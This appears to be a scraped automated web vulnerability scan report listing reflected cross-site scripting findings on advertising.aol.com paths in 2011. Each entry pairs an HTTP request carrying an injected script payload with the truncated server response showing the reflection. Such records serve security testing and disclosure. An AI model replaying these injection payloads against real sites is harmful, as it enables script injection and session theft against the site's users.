HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:28:27 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:28:27 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13368 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/b1c7f"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/3/4/1/ |
GET /b801f"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:29:33 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:29:33 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13438 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/3/4/1/ |
GET /1e341"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:29:36 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:29:36 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13368 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/1e341"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/4/4/1/ |
GET /a144a"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:28:42 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:28:42 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13368 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/a144a"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/4/4/1/ |
GET /bbabf"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:28:39 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:28:39 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13438 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/5/4/1/ |
GET /d3ecd"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:28:54 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:28:54 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13434 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/5/4/1/ |
GET /e2375"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:28:57 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:28:57 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13368 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/e2375"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/6/4/1/ |
GET /c8368"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:29:46 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:29:46 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13438 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/6/4/1/ |
GET /1111f"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:29:49 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:29:49 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13368 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/1111f"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/7/4/1/ |
GET /3d8b9"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:30:02 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:30:02 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13368 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/3d8b9"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/7/4/1/ |
GET /5bf03"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:29:58 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:29:58 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13438 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/8/4/1/ |
GET /bccd4"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:29:46 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:29:46 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13368 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/bccd4"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/8/4/1/ |
GET /17768"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:29:43 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:29:43 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13438 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /nai/nai.php |
GET /naif67fb"><script>alert(1)< Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:44:49 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:44:49 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13502 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /nai/nai.php |
GET /nai88df7"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:44:52 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:44:52 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13432 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... _265=s_gi('aolamn,aolsvc' s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai88df7"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /nai/nai.php |
GET /nai/nai.php6a107"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:45:03 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:45:03 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13432 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... i('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai/nai.php6a107"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /nai/nai.php |
GET /nai/nai.phpc40c6"><script>alert(1)< Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:45:00 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:45:00 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13502 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /nai/nai.php |
GET /nai/nai.php?action_id=3%0060c4f'><script>alert(1 Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:44:14 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Content-Type: text/html Content-Length: 13896 <html xmlns="http://www.w3.org <head> <script> // dynamic variables var numFrames = 9; var redirectUrlNoCookie = "http://www.networka var redire ...[SNIP]... <iframe id='frame_0' src='http://nai ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/0/2/1812733584/ |
GET /bfbdd"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:15:30 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:15:30 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13404 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/bfbdd"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/0/2/1812733584/ |
GET /7b81e"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:15:27 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:15:27 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13474 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/0/3/295357155/ |
GET /4c934"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:59 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:59 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13400 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/4c934"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/0/3/295357155/ |
GET /cc591"><script>alert(1)< Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:55 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:55 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13470 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
